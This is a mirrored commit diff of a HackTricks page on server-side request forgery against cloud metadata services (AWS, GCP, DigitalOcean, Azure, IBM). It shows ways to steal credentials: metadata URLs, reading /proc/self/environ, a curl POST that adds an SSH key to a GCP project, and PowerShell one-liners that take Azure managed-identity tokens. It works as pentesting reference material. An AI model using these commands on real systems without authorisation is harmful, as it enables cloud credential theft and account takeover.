mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	aa ssrf
This commit is contained in:
		
							parent
							
								
									10c0f3e054
								
							
						
					
					
						commit
						21283c5644
					
				| @ -111,7 +111,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null | | |||||||
| > [!NOTE] | > [!NOTE] | ||||||
| > Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role. | > Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role. | ||||||
| 
 | 
 | ||||||
| ### SSRF for AWS Lambda <a href="#id-6f97" id="id-6f97"></a> | ### SSRF for AWS Lambda | ||||||
| 
 | 
 | ||||||
| In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**. | In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**. | ||||||
| 
 | 
 | ||||||
| @ -126,7 +126,7 @@ Moreover, in addition to IAM credentials, Lambda functions also have **event dat | |||||||
| > [!WARNING] | > [!WARNING] | ||||||
| > Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app. | > Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app. | ||||||
| 
 | 
 | ||||||
| ### SSRF URL for AWS Elastic Beanstalk <a href="#id-6f97" id="id-6f97"></a> | ### SSRF URL for AWS Elastic Beanstalk | ||||||
| 
 | 
 | ||||||
| We retrieve the `accountId` and `region` from the API. | We retrieve the `accountId` and `region` from the API. | ||||||
| 
 | 
 | ||||||
| @ -145,11 +145,11 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean | |||||||
| 
 | 
 | ||||||
| Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. | Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. | ||||||
| 
 | 
 | ||||||
| ## GCP <a href="#id-6440" id="id-6440"></a> | ## GCP | ||||||
| 
 | 
 | ||||||
| You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata). | You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata). | ||||||
| 
 | 
 | ||||||
| ### SSRF URL for Google Cloud <a href="#id-6440" id="id-6440"></a> | ### SSRF URL for Google Cloud | ||||||
| 
 | 
 | ||||||
| Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs: | Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs: | ||||||
| 
 | 
 | ||||||
| @ -260,7 +260,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true | |||||||
| > gcloud config unset auth/access_token_file | > gcloud config unset auth/access_token_file | ||||||
| > ``` | > ``` | ||||||
| 
 | 
 | ||||||
| ### Add an SSH key <a href="#id-3e24" id="id-3e24"></a> | ### Add an SSH key | ||||||
| 
 | 
 | ||||||
| Extract the token | Extract the token | ||||||
| 
 | 
 | ||||||
| @ -289,7 +289,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo | |||||||
| --data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}' | --data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}' | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
| ### Cloud Functions <a href="#id-9f1f" id="id-9f1f"></a> | ### Cloud Functions | ||||||
| 
 | 
 | ||||||
| The metadata endpoint works the same as in VMs but without some endpoints: | The metadata endpoint works the same as in VMs but without some endpoints: | ||||||
| 
 | 
 | ||||||
| @ -318,7 +318,7 @@ for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMeta | |||||||
| done | done | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
| ## Digital Ocean <a href="#id-9f1f" id="id-9f1f"></a> | ## Digital Ocean | ||||||
| 
 | 
 | ||||||
| > [!WARNING] | > [!WARNING] | ||||||
| > There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials | > There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials | ||||||
| @ -337,7 +337,7 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re | |||||||
| curl http://169.254.169.254/metadata/v1.json | jq | curl http://169.254.169.254/metadata/v1.json | jq | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
| ## Azure <a href="#cea8" id="cea8"></a> | ## Azure | ||||||
| 
 | 
 | ||||||
| ### Azure VM | ### Azure VM | ||||||
| 
 | 
 | ||||||
| @ -442,7 +442,7 @@ $userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "h | |||||||
| {{#endtab}} | {{#endtab}} | ||||||
| {{#endtabs}} | {{#endtabs}} | ||||||
| 
 | 
 | ||||||
| ### Azure App & Functions Services | ### Azure App & Functions Services & Automation Accounts | ||||||
| 
 | 
 | ||||||
| From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server. | From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server. | ||||||
| 
 | 
 | ||||||
| @ -519,57 +519,28 @@ $storageToken = Get-Token -Resource "https://storage.azure.com/" | |||||||
| Write-Host "Storage Token: $storageToken" | Write-Host "Storage Token: $storageToken" | ||||||
| 
 | 
 | ||||||
| 
 | 
 | ||||||
|  | # Using oneliners | ||||||
| 
 | 
 | ||||||
|  | ## Get management token | ||||||
|  | (Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://management.azure.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token | ||||||
| 
 | 
 | ||||||
|  | ## Get graph token | ||||||
|  | (Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://graph.microsoft.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token | ||||||
| 
 | 
 | ||||||
|  | ## Get vault token | ||||||
|  | (Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://vault.azure.net/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token | ||||||
| 
 | 
 | ||||||
|  | ## Get storage token | ||||||
|  | (Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://storage.azure.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token | ||||||
| 
 | 
 | ||||||
| 
 | ## Remember that in Automation Accounts it might be declared the client ID of the assigned user managed identity inside the variable that can be gatehred with: | ||||||
| # API request in powershell to management endpoint | Get-AutomationVariable -Name 'AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID' | ||||||
| $Token = 'eyJ0eX..' |  | ||||||
| $URI='https://management.azure.com/subscriptions?api-version=2020-01-01' |  | ||||||
| $RequestParams = @{ |  | ||||||
|  Method = 'GET' |  | ||||||
|  Uri = $URI |  | ||||||
|  Headers = @{ |  | ||||||
|   'Authorization' = "Bearer $Token" |  | ||||||
|  } |  | ||||||
| } |  | ||||||
| (Invoke-RestMethod @RequestParams).value |  | ||||||
| 
 |  | ||||||
| # API request to graph endpoint (get enterprise applications) |  | ||||||
| $Token = 'eyJ0eX..' |  | ||||||
| $URI = 'https://graph.microsoft.com/v1.0/applications' |  | ||||||
| $RequestParams = @{ |  | ||||||
|  Method = 'GET' |  | ||||||
|  Uri = $URI |  | ||||||
|  Headers = @{ |  | ||||||
|  'Authorization' = "Bearer $Token" |  | ||||||
|  } |  | ||||||
| } |  | ||||||
| (Invoke-RestMethod @RequestParams).value |  | ||||||
| 
 |  | ||||||
| # Using AzureAD Powershell module witho both management and graph tokens |  | ||||||
| $token = 'eyJ0e..' |  | ||||||
| $graphaccesstoken = 'eyJ0eX..' |  | ||||||
| Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId 2e91a4f12984-46ee-2736-e32ff2039abc |  | ||||||
| 
 |  | ||||||
| # Try to get current perms over resources |  | ||||||
| Get-AzResource |  | ||||||
| ## The following error means that the user doesn't have permissions over any resource |  | ||||||
| Get-AzResource : 'this.Client.SubscriptionId' cannot be null. |  | ||||||
| At line:1 char:1 |  | ||||||
| + Get-AzResource |  | ||||||
| + ~~~~~~~~~~~~~~ |  | ||||||
|  + CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException |  | ||||||
|  + FullyQualifiedErrorId : |  | ||||||
| Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet |  | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
| {{#endtab}} | {{#endtab}} | ||||||
| {{#endtabs}} | {{#endtabs}} | ||||||
| 
 | 
 | ||||||
| ## IBM Cloud <a href="#id-2af0" id="id-2af0"></a> | ## IBM Cloud | ||||||
| 
 | 
 | ||||||
| > [!WARNING] | > [!WARNING] | ||||||
| > Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM | > Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM | ||||||
|  | |||||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user